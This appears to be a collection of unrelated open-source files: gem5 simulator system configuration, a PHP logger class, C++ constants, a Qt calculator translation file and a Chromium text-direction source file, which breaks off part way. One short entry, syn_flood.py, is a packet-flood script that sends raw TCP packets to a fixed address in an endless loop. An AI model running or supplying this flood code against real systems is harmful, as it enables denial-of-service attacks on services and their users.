# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Kevin Lim
from m5.objects import *
from Benchmarks import *
from m5.util import *
class CowIdeDisk(IdeDisk):
image = CowDiskImage(child=RawDiskImage(read_only=True),
read_only=False)
def childImage(self, ci):
self.image.child.image_file = ci
class MemBus(CoherentXBar):
badaddr_responder = BadAddr()
default = Self.badaddr_responder.pio
def makeLinuxAlphaSystem(mem_mode, mdesc = None, ruby = False):
class BaseTsunami(Tsunami):
ethernet = NSGigE(pci_bus=0, pci_dev=1, pci_func=0)
ide = IdeController(disks=[Parent.disk0, Parent.disk2],
pci_func=0, pci_dev=0, pci_bus=0)
self = LinuxAlphaSystem()
if not mdesc:
# generic system
mdesc = SysConfig()
self.readfile = mdesc.script()
self.tsunami = BaseTsunami()
# Create the io bus to connect all device ports
self.iobus = NoncoherentXBar()
self.tsunami.attachIO(self.iobus)
self.tsunami.ide.pio = self.iobus.master
self.tsunami.ide.config = self.iobus.master
self.tsunami.ethernet.pio = self.iobus.master
self.tsunami.ethernet.config = self.iobus.master
if ruby:
# Store the dma devices for later connection to dma ruby ports.
# Append an underscore to dma_ports to avoid the SimObjectVector check.
self._dma_ports = [self.tsunami.ide.dma, self.tsunami.ethernet.dma]
else:
self.membus = MemBus()
# By default the bridge responds to all addresses above the I/O
# base address (including the PCI config space)
IO_address_space_base = 0x80000000000
self.bridge = Bridge(delay='50ns',
ranges = [AddrRange(IO_address_space_base, Addr.max)])
self.bridge.master = self.iobus.slave
self.bridge.slave = self.membus.master
self.tsunami.ide.dma = self.iobus.slave
self.tsunami.ethernet.dma = self.iobus.slave
self.system_port = self.membus.slave
self.mem_ranges = [AddrRange(mdesc.mem())]
self.disk0 = CowIdeDisk(driveID='master')
self.disk2 = CowIdeDisk(driveID='master')
self.disk0.childImage(mdesc.disk())
self.disk2.childImage(disk('linux-bigswap2.img'))
self.simple_disk = SimpleDisk(disk=RawDiskImage(image_file = mdesc.disk(),
read_only = True))
self.intrctrl = IntrControl()
self.mem_mode = mem_mode
self.terminal = Terminal()
self.kernel = binary('vmlinux')
self.pal = binary('ts_osfpal')
self.console = binary('console')
self.boot_osflags = 'root=/dev/hda1 console=ttyS0'
return self
def makeSparcSystem(mem_mode, mdesc = None):
# Constants from iob.cc and uart8250.cc
iob_man_addr = 0x9800000000
uart_pio_size = 8
class CowMmDisk(MmDisk):
image = CowDiskImage(child=RawDiskImage(read_only=True),
read_only=False)
def childImage(self, ci):
self.image.child.image_file = ci
self = SparcSystem()
if not mdesc:
# generic system
mdesc = SysConfig()
self.readfile = mdesc.script()
self.iobus = NoncoherentXBar()
self.membus = MemBus()
self.bridge = Bridge(delay='50ns')
self.t1000 = T1000()
self.t1000.attachOnChipIO(self.membus)
self.t1000.attachIO(self.iobus)
self.mem_ranges = [AddrRange(Addr('1MB'), size = '64MB'),
AddrRange(Addr('2GB'), size ='256MB')]
self.bridge.master = self.iobus.slave
self.bridge.slave = self.membus.master
self.rom.port = self.membus.master
self.nvram.port = self.membus.master
self.hypervisor_desc.port = self.membus.master
self.partition_desc.port = self.membus.master
self.intrctrl = IntrControl()
self.disk0 = CowMmDisk()
self.disk0.childImage(disk('disk.s10hw2'))
self.disk0.pio = self.iobus.master
# The puart0 and hvuart are placed on the IO bus, so create ranges
# for them. The remaining IO range is rather fragmented, so poke
# holes for the iob and partition descriptors etc.
self.bridge.ranges = \
[
AddrRange(self.t1000.puart0.pio_addr,
self.t1000.puart0.pio_addr + uart_pio_size - 1),
AddrRange(self.disk0.pio_addr,
self.t1000.fake_jbi.pio_addr +
self.t1000.fake_jbi.pio_size - 1),
AddrRange(self.t1000.fake_clk.pio_addr,
iob_man_addr - 1),
AddrRange(self.t1000.fake_l2_1.pio_addr,
self.t1000.fake_ssi.pio_addr +
self.t1000.fake_ssi.pio_size - 1),
AddrRange(self.t1000.hvuart.pio_addr,
self.t1000.hvuart.pio_addr + uart_pio_size - 1)
]
self.reset_bin = binary('reset_new.bin')
self.hypervisor_bin = binary('q_new.bin')
self.openboot_bin = binary('openboot_new.bin')
self.nvram_bin = binary('nvram1')
self.hypervisor_desc_bin = binary('1up-hv.bin')
self.partition_desc_bin = binary('1up-md.bin')
self.system_port = self.membus.slave
return self
def makeArmSystem(mem_mode, machine_type, mdesc = None,
dtb_filename = None, bare_metal=False,
sdcard_image = "sdcard-1g-mxplayer.img"):
assert machine_type
if bare_metal:
self = ArmSystem()
else:
self = LinuxArmSystem()
if not mdesc:
# generic system
mdesc = SysConfig()
self.readfile = mdesc.script()
self.iobus = NoncoherentXBar()
self.membus = MemBus()
self.membus.badaddr_responder.warn_access = "warn"
self.bridge = Bridge(delay='50ns')
self.bridge.master = self.iobus.slave
self.bridge.slave = self.membus.master
self.mem_mode = mem_mode
if machine_type == "RealView_PBX":
self.realview = RealViewPBX()
elif machine_type == "RealView_EB":
self.realview = RealViewEB()
elif machine_type == "VExpress_ELT":
self.realview = VExpress_ELT()
elif machine_type == "VExpress_EMM":
self.realview = VExpress_EMM()
elif machine_type == "VExpress_EMM64":
self.realview = VExpress_EMM64()
else:
print "Unknown Machine Type"
sys.exit(1)
self.cf0 = CowIdeDisk(driveID='master')
self.cf2 = CowIdeDisk(driveID='master')
self.cf0.childImage(mdesc.disk())
self.cf2.childImage(disk(sdcard_image))
# Attach any PCI devices this platform supports
self.realview.attachPciDevices()
# default to an IDE controller rather than a CF one
try:
self.realview.ide.disks = [self.cf0, self.cf2]
except:
self.realview.cf_ctrl.disks = [self.cf0, self.cf2]
if bare_metal:
# EOT character on UART will end the simulation
self.realview.uart.end_on_eot = True
self.mem_ranges = [AddrRange(self.realview.mem_start_addr,
size = mdesc.mem())]
else:
if machine_type == "VExpress_EMM64":
self.kernel = binary('vmlinux-3.16-aarch64-vexpress-emm64-pcie')
elif machine_type == "VExpress_EMM":
self.kernel = binary('vmlinux-3.3-arm-vexpress-emm-pcie')
else:
self.kernel = binary('vmlinux.arm.smp.fb.2.6.38.8')
if dtb_filename:
self.dtb_filename = binary(dtb_filename)
self.machine_type = machine_type
# Ensure that writes to the UART actually go out early in the boot
boot_flags = 'earlyprintk=pl011,0x1c090000 console=ttyAMA0 ' + \
'lpj=19988480 norandmaps rw loglevel=8 ' + \
'mem=%s root=/dev/sda1' % mdesc.mem()
self.mem_ranges = []
size_remain = long(Addr(mdesc.mem()))
for region in self.realview._mem_regions:
if size_remain > long(region[1]):
self.mem_ranges.append(AddrRange(region[0], size=region[1]))
size_remain = size_remain - long(region[1])
else:
self.mem_ranges.append(AddrRange(region[0], size=size_remain))
size_remain = 0
break
warn("Memory size specified spans more than one region. Creating" \
" another memory controller for that range.")
if size_remain > 0:
fatal("The currently selected ARM platforms doesn't support" \
" the amount of DRAM you've selected. Please try" \
" another platform")
self.realview.setupBootLoader(self.membus, self, binary)
self.gic_cpu_addr = self.realview.gic.cpu_addr
self.flags_addr = self.realview.realview_io.pio_addr + 0x30
if mdesc.disk().lower().count('android'):
boot_flags += " init=/init "
self.boot_osflags = boot_flags
self.realview.attachOnChipIO(self.membus, self.bridge)
self.realview.attachIO(self.iobus)
self.intrctrl = IntrControl()
self.terminal = Terminal()
self.vncserver = VncServer()
self.system_port = self.membus.slave
return self
def makeLinuxMipsSystem(mem_mode, mdesc = None):
class BaseMalta(Malta):
ethernet = NSGigE(pci_bus=0, pci_dev=1, pci_func=0)
ide = IdeController(disks=[Parent.disk0, Parent.disk2],
pci_func=0, pci_dev=0, pci_bus=0)
self = LinuxMipsSystem()
if not mdesc:
# generic system
mdesc = SysConfig()
self.readfile = mdesc.script()
self.iobus = NoncoherentXBar()
self.membus = MemBus()
self.bridge = Bridge(delay='50ns')
self.mem_ranges = [AddrRange('1GB')]
self.bridge.master = self.iobus.slave
self.bridge.slave = self.membus.master
self.disk0 = CowIdeDisk(driveID='master')
self.disk2 = CowIdeDisk(driveID='master')
self.disk0.childImage(mdesc.disk())
self.disk2.childImage(disk('linux-bigswap2.img'))
self.malta = BaseMalta()
self.malta.attachIO(self.iobus)
self.malta.ide.pio = self.iobus.master
self.malta.ide.config = self.iobus.master
self.malta.ide.dma = self.iobus.slave
self.malta.ethernet.pio = self.iobus.master
self.malta.ethernet.config = self.iobus.master
self.malta.ethernet.dma = self.iobus.slave
self.simple_disk = SimpleDisk(disk=RawDiskImage(image_file = mdesc.disk(),
read_only = True))
self.intrctrl = IntrControl()
self.mem_mode = mem_mode
self.terminal = Terminal()
self.kernel = binary('mips/vmlinux')
self.console = binary('mips/console')
self.boot_osflags = 'root=/dev/hda1 console=ttyS0'
self.system_port = self.membus.slave
return self
def x86IOAddress(port):
IO_address_space_base = 0x8000000000000000
return IO_address_space_base + port
def connectX86ClassicSystem(x86_sys, numCPUs):
# Constants similar to x86_traits.hh
IO_address_space_base = 0x8000000000000000
pci_config_address_space_base = 0xc000000000000000
interrupts_address_space_base = 0xa000000000000000
APIC_range_size = 1 << 12;
x86_sys.membus = MemBus()
# North Bridge
x86_sys.iobus = NoncoherentXBar()
x86_sys.bridge = Bridge(delay='50ns')
x86_sys.bridge.master = x86_sys.iobus.slave
x86_sys.bridge.slave = x86_sys.membus.master
# Allow the bridge to pass through the IO APIC (two pages),
# everything in the IO address range up to the local APIC, and
# then the entire PCI address space and beyond
x86_sys.bridge.ranges = \
[
AddrRange(x86_sys.pc.south_bridge.io_apic.pio_addr,
x86_sys.pc.south_bridge.io_apic.pio_addr +
APIC_range_size - 1),
AddrRange(IO_address_space_base,
interrupts_address_space_base - 1),
AddrRange(pci_config_address_space_base,
Addr.max)
]
# Create a bridge from the IO bus to the memory bus to allow access to
# the local APIC (two pages)
x86_sys.apicbridge = Bridge(delay='50ns')
x86_sys.apicbridge.slave = x86_sys.iobus.master
x86_sys.apicbridge.master = x86_sys.membus.slave
x86_sys.apicbridge.ranges = [AddrRange(interrupts_address_space_base,
interrupts_address_space_base +
numCPUs * APIC_range_size
- 1)]
# connect the io bus
x86_sys.pc.attachIO(x86_sys.iobus)
x86_sys.system_port = x86_sys.membus.slave
def connectX86RubySystem(x86_sys):
# North Bridge
x86_sys.iobus = NoncoherentXBar()
# add the ide to the list of dma devices that later need to attach to
# dma controllers
x86_sys._dma_ports = [x86_sys.pc.south_bridge.ide.dma]
x86_sys.pc.attachIO(x86_sys.iobus, x86_sys._dma_ports)
def makeX86System(mem_mode, numCPUs = 1, mdesc = None, self = None,
Ruby = False):
if self == None:
self = X86System()
if not mdesc:
# generic system
mdesc = SysConfig()
self.readfile = mdesc.script()
self.mem_mode = mem_mode
# Physical memory
# On the PC platform, the memory region 0xC0000000-0xFFFFFFFF is reserved
# for various devices. Hence, if the physical memory size is greater than
# 3GB, we need to split it into two parts.
excess_mem_size = \
convert.toMemorySize(mdesc.mem()) - convert.toMemorySize('3GB')
if excess_mem_size <= 0:
self.mem_ranges = [AddrRange(mdesc.mem())]
else:
warn("Physical memory size specified is %s which is greater than " \
"3GB. Twice the number of memory controllers would be " \
"created." % (mdesc.mem()))
self.mem_ranges = [AddrRange('3GB'),
AddrRange(Addr('4GB'), size = excess_mem_size)]
# Platform
self.pc = Pc()
# Create and connect the busses required by each memory system
if Ruby:
connectX86RubySystem(self)
else:
connectX86ClassicSystem(self, numCPUs)
self.intrctrl = IntrControl()
# Disks
disk0 = CowIdeDisk(driveID='master')
disk2 = CowIdeDisk(driveID='master')
disk0.childImage(mdesc.disk())
disk2.childImage(disk('linux-bigswap2.img'))
self.pc.south_bridge.ide.disks = [disk0, disk2]
# Add in a Bios information structure.
structures = [X86SMBiosBiosInformation()]
self.smbios_table.structures = structures
# Set up the Intel MP table
base_entries = []
ext_entries = []
for i in xrange(numCPUs):
bp = X86IntelMPProcessor(
local_apic_id = i,
local_apic_version = 0x14,
enable = True,
bootstrap = (i == 0))
base_entries.append(bp)
io_apic = X86IntelMPIOAPIC(
id = numCPUs,
version = 0x11,
enable = True,
address = 0xfec00000)
self.pc.south_bridge.io_apic.apic_id = io_apic.id
base_entries.append(io_apic)
isa_bus = X86IntelMPBus(bus_id = 0, bus_type='ISA')
base_entries.append(isa_bus)
pci_bus = X86IntelMPBus(bus_id = 1, bus_type='PCI')
base_entries.append(pci_bus)
connect_busses = X86IntelMPBusHierarchy(bus_id=0,
subtractive_decode=True, parent_bus=1)
ext_entries.append(connect_busses)
pci_dev4_inta = X86IntelMPIOIntAssignment(
interrupt_type = 'INT',
polarity = 'ConformPolarity',
trigger = 'ConformTrigger',
source_bus_id = 1,
source_bus_irq = 0 + (4 << 2),
dest_io_apic_id = io_apic.id,
dest_io_apic_intin = 16)
base_entries.append(pci_dev4_inta)
def assignISAInt(irq, apicPin):
assign_8259_to_apic = X86IntelMPIOIntAssignment(
interrupt_type = 'ExtInt',
polarity = 'ConformPolarity',
trigger = 'ConformTrigger',
source_bus_id = 0,
source_bus_irq = irq,
dest_io_apic_id = io_apic.id,
dest_io_apic_intin = 0)
base_entries.append(assign_8259_to_apic)
assign_to_apic = X86IntelMPIOIntAssignment(
interrupt_type = 'INT',
polarity = 'ConformPolarity',
trigger = 'ConformTrigger',
source_bus_id = 0,
source_bus_irq = irq,
dest_io_apic_id = io_apic.id,
dest_io_apic_intin = apicPin)
base_entries.append(assign_to_apic)
assignISAInt(0, 2)
assignISAInt(1, 1)
for i in range(3, 15):
assignISAInt(i, i)
self.intel_mp_table.base_entries = base_entries
self.intel_mp_table.ext_entries = ext_entries
def makeLinuxX86System(mem_mode, numCPUs = 1, mdesc = None,
Ruby = False):
self = LinuxX86System()
# Build up the x86 system and then specialize it for Linux
makeX86System(mem_mode, numCPUs, mdesc, self, Ruby)
# We assume below that there's at least 1MB of memory. We'll require 2
# just to avoid corner cases.
phys_mem_size = sum(map(lambda r: r.size(), self.mem_ranges))
assert(phys_mem_size >= 0x200000)
assert(len(self.mem_ranges) <= 2)
entries = \
[
# Mark the first megabyte of memory as reserved
X86E820Entry(addr = 0, size = '639kB', range_type = 1),
X86E820Entry(addr = 0x9fc00, size = '385kB', range_type = 2),
# Mark the rest of physical memory as available
X86E820Entry(addr = 0x100000,
size = '%dB' % (self.mem_ranges[0].size() - 0x100000),
range_type = 1),
# Reserve the last 16kB of the 32-bit address space for the
# m5op interface
X86E820Entry(addr=0xFFFF0000, size='64kB', range_type=2),
]
# In case the physical memory is greater than 3GB, we split it into two
# parts and add a separate e820 entry for the second part. This entry
# starts at 0x100000000, which is the first address after the space
# reserved for devices.
if len(self.mem_ranges) == 2:
entries.append(X86E820Entry(addr = 0x100000000,
size = '%dB' % (self.mem_ranges[1].size()), range_type = 1))
self.e820_table.entries = entries
# Command line
self.boot_osflags = 'earlyprintk=ttyS0 console=ttyS0 lpj=7999923 ' + \
'root=/dev/hda1'
self.kernel = binary('x86_64-vmlinux-2.6.22.9')
return self
def makeDualRoot(full_system, testSystem, driveSystem, dumpfile):
self = Root(full_system = full_system)
self.testsys = testSystem
self.drivesys = driveSystem
self.etherlink = EtherLink()
if hasattr(testSystem, 'realview'):
self.etherlink.int0 = Parent.testsys.realview.ethernet.interface
self.etherlink.int1 = Parent.drivesys.realview.ethernet.interface
elif hasattr(testSystem, 'tsunami'):
self.etherlink.int0 = Parent.testsys.tsunami.ethernet.interface
self.etherlink.int1 = Parent.drivesys.tsunami.ethernet.interface
else:
fatal("Don't know how to connect these system together")
if dumpfile:
self.etherdump = EtherDump(file=dumpfile)
self.etherlink.dump = Parent.etherdump
return self
| lokeshjindal15/gem5_transform | configs/common/FSConfig.py | Python | bsd-3-clause | 21,365 |
from tcp_ip_raw_socket import *
def main():
fd = createSocket()
pkt = buildPacket("10.1.1.2", "10.1.1.1", 54321, 80, "Hello, how are you?")
try:
print "Starting flood"
while True:
sendPacket(fd, pkt, "10.1.1.2")
except KeyboardInterrupt:
print "Closing..."
if __name__ == "__main__":
main() | Digoss/funny_python | syn_flood.py | Python | bsd-3-clause | 310 |
<?php
/**
* Garp_Log
* class description
*
* @package Garp
* @author Harmen Janssen <harmen@grrr.nl>
*/
class Garp_Log extends Zend_Log {
/**
* Shortcut to fetching a configured logger instance
*
* @param array|Zend_Config $config Array or instance of Zend_Config
* @return Zend_Log
*/
static public function factory($config = array()) {
if (is_string($config)) {
// Assume $config is a filename
$filename = $config;
$config = array(
'timestampFormat' => 'Y-m-d',
array(
'writerName' => 'Stream',
'writerParams' => array(
'stream' => self::_getLoggingDirectory() . DIRECTORY_SEPARATOR . $filename
)
)
);
}
return parent::factory($config);
}
static protected function _getLoggingDirectory() {
$target = APPLICATION_PATH . '/data/logs/';
if (Zend_Registry::isRegistered('config')
&& !empty(Zend_Registry::get('config')->logging->directory)
) {
$target = Zend_Registry::get('config')->logging->directory;
}
if (!is_dir($target)) {
@mkdir($target);
}
return $target;
}
}
| grrr-amsterdam/garp3 | library/Garp/Log.php | PHP | bsd-3-clause | 1,317 |
// Copyright (c) 2014, Sailing Lab
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// 1. Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// 3. Neither the name of the <ORGANIZATION> nor the names of its contributors
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
#pragma once
namespace petuum {
const size_t kNumBitsPerByte = 8;
const size_t kTwoToPowerTen = 1024;
const float kCuckooExpansionFactor = 1.428;
}
| zengjichuan/jetuum | src/petuum_ps_common/include/constants.hpp | C++ | bsd-3-clause | 1,709 |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.1" language="el_GR">
<context>
<name>XDGDesktopList</name>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="608"/>
<source>Multimedia</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="609"/>
<source>Development</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="610"/>
<source>Education</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="611"/>
<source>Games</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="612"/>
<source>Graphics</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="613"/>
<source>Network</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="614"/>
<source>Office</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="615"/>
<source>Science</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="616"/>
<source>Settings</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="617"/>
<source>System</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="618"/>
<source>Utility</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="619"/>
<source>Wine</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="620"/>
<source>Unsorted</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>mainUI</name>
<message>
<location filename="../mainUI.ui" line="14"/>
<location filename="../mainUI.cpp" line="53"/>
<source>Calculator</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.ui" line="657"/>
<source>Advanced Operations</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="83"/>
<source>Percentage %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="85"/>
<source>Power %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="87"/>
<source>Base-10 Exponential %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="89"/>
<source>Exponential %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="91"/>
<source>Constant Pi %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="94"/>
<source>Square Root %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="96"/>
<source>Logarithm %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="98"/>
<source>Natural Log %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="101"/>
<source>Sine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="103"/>
<source>Cosine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="105"/>
<source>Tangent %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="108"/>
<source>Arc Sine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="110"/>
<source>Arc Cosine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="112"/>
<source>Arc Tangent %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="115"/>
<source>Hyperbolic Sine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="117"/>
<source>Hyperbolic Cosine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="119"/>
<source>Hyperbolic Tangent %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="182"/>
<source>Save Calculator History</source>
<translation type="unfinished"></translation>
</message>
</context>
</TS>
| cpforbes/lumina | src-qt5/desktop-utils/lumina-calculator/i18n/l-calc_el.ts | TypeScript | bsd-3-clause | 6,376 |
// Copyright (c) 2011 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "base/i18n/rtl.h"
#include "base/files/file_path.h"
#include "base/logging.h"
#include "base/strings/string_util.h"
#include "base/strings/sys_string_conversions.h"
#include "base/strings/utf_string_conversions.h"
#include "third_party/icu/source/common/unicode/locid.h"
#include "third_party/icu/source/common/unicode/uchar.h"
#include "third_party/icu/source/common/unicode/uscript.h"
#include "third_party/icu/source/i18n/unicode/coll.h"
#if defined(TOOLKIT_GTK)
#include <gtk/gtk.h>
#endif
namespace {
// Extract language, country and variant, but ignore keywords. For example,
// en-US, ca@valencia, ca-ES@valencia.
std::string GetLocaleString(const icu::Locale& locale) {
const char* language = locale.getLanguage();
const char* country = locale.getCountry();
const char* variant = locale.getVariant();
std::string result =
(language != NULL && *language != '\0') ? language : "und";
if (country != NULL && *country != '\0') {
result += '-';
result += country;
}
if (variant != NULL && *variant != '\0') {
std::string variant_str(variant);
StringToLowerASCII(&variant_str);
result += '@' + variant_str;
}
return result;
}
// Returns LEFT_TO_RIGHT or RIGHT_TO_LEFT if |character| has strong
// directionality, returns UNKNOWN_DIRECTION if it doesn't. Please refer to
// http://unicode.org/reports/tr9/ for more information.
base::i18n::TextDirection GetCharacterDirection(UChar32 character) {
// Now that we have the character, we use ICU in order to query for the
// appropriate Unicode BiDi character type.
int32_t property = u_getIntPropertyValue(character, UCHAR_BIDI_CLASS);
if ((property == U_RIGHT_TO_LEFT) ||
(property == U_RIGHT_TO_LEFT_ARABIC) ||
(property == U_RIGHT_TO_LEFT_EMBEDDING) ||
(property == U_RIGHT_TO_LEFT_OVERRIDE)) {
return base::i18n::RIGHT_TO_LEFT;
} else if ((property == U_LEFT_TO_RIGHT) ||
(property == U_LEFT_TO_RIGHT_EMBEDDING) ||
(property == U_LEFT_TO_RIGHT_OVERRIDE)) {
return base::i18n::LEFT_TO_RIGHT;
}
return base::i18n::UNKNOWN_DIRECTION;
}
} // namespace
namespace base {
namespace i18n {
// Represents the locale-specific ICU text direction.
static TextDirection g_icu_text_direction = UNKNOWN_DIRECTION;
// Convert the ICU default locale to a string.
std::string GetConfiguredLocale() {
return GetLocaleString(icu::Locale::getDefault());
}
// Convert the ICU canonicalized locale to a string.
std::string GetCanonicalLocale(const char* locale) {
return GetLocaleString(icu::Locale::createCanonical(locale));
}
// Convert Chrome locale name to ICU locale name
std::string ICULocaleName(const std::string& locale_string) {
// If not Spanish, just return it.
if (locale_string.substr(0, 2) != "es")
return locale_string;
// Expand es to es-ES.
if (LowerCaseEqualsASCII(locale_string, "es"))
return "es-ES";
// Map es-419 (Latin American Spanish) to es-FOO depending on the system
// locale. If it's es-RR other than es-ES, map to es-RR. Otherwise, map
// to es-MX (the most populous in Spanish-speaking Latin America).
if (LowerCaseEqualsASCII(locale_string, "es-419")) {
const icu::Locale& locale = icu::Locale::getDefault();
std::string language = locale.getLanguage();
const char* country = locale.getCountry();
if (LowerCaseEqualsASCII(language, "es") &&
!LowerCaseEqualsASCII(country, "es")) {
language += '-';
language += country;
return language;
}
return "es-MX";
}
// Currently, Chrome has only "es" and "es-419", but later we may have
// more specific "es-RR".
return locale_string;
}
void SetICUDefaultLocale(const std::string& locale_string) {
icu::Locale locale(ICULocaleName(locale_string).c_str());
UErrorCode error_code = U_ZERO_ERROR;
icu::Locale::setDefault(locale, error_code);
// This return value is actually bogus because Locale object is
// an ID and setDefault seems to always succeed (regardless of the
// presence of actual locale data). However,
// it does not hurt to have it as a sanity check.
DCHECK(U_SUCCESS(error_code));
g_icu_text_direction = UNKNOWN_DIRECTION;
}
bool IsRTL() {
#if defined(TOOLKIT_GTK)
GtkTextDirection gtk_dir = gtk_widget_get_default_direction();
return gtk_dir == GTK_TEXT_DIR_RTL;
#else
return ICUIsRTL();
#endif
}
bool ICUIsRTL() {
if (g_icu_text_direction == UNKNOWN_DIRECTION) {
const icu::Locale& locale = icu::Locale::getDefault();
g_icu_text_direction = GetTextDirectionForLocale(locale.getName());
}
return g_icu_text_direction == RIGHT_TO_LEFT;
}
TextDirection GetTextDirectionForLocale(const char* locale_name) {
UErrorCode status = U_ZERO_ERROR;
ULayoutType layout_dir = uloc_getCharacterOrientation(locale_name, &status);
DCHECK(U_SUCCESS(status));
// Treat anything other than RTL as LTR.
return (layout_dir != ULOC_LAYOUT_RTL) ? LEFT_TO_RIGHT : RIGHT_TO_LEFT;
}
TextDirection GetFirstStrongCharacterDirection(const string16& text) {
const UChar* string = text.c_str();
size_t length = text.length();
size_t position = 0;
while (position < length) {
UChar32 character;
size_t next_position = position;
U16_NEXT(string, next_position, length, character);
TextDirection direction = GetCharacterDirection(character);
if (direction != UNKNOWN_DIRECTION)
return direction;
position = next_position;
}
return LEFT_TO_RIGHT;
}
TextDirection GetLastStrongCharacterDirection(const string16& text) {
const UChar* string = text.c_str();
size_t position = text.length();
while (position > 0) {
UChar32 character;
size_t prev_position = position;
U16_PREV(string, 0, prev_position, character);
TextDirection direction = GetCharacterDirection(character);
if (direction != UNKNOWN_DIRECTION)
return direction;
position = prev_position;
}
return LEFT_TO_RIGHT;
}
TextDirection GetStringDirection(const string16& text) {
const UChar* string = text.c_str();
size_t length = text.length();
size_t position = 0;
TextDirection result(UNKNOWN_DIRECTION);
while (position < length) {
UChar32 character;
size_t next_position = position;
U16_NEXT(string, next_position, length, character);
TextDirection direction = GetCharacterDirection(character);
if (direction != UNKNOWN_DIRECTION) {
if (result != UNKNOWN_DIRECTION && result != direction)
return UNKNOWN_DIRECTION;
result = direction;
}
position = next_position;
}
// Handle the case of a string not containing any strong directionality
// characters defaulting to LEFT_TO_RIGHT.
if (result == UNKNOWN_DIRECTION)
return LEFT_TO_RIGHT;
return result;
}
#if defined(OS_WIN)
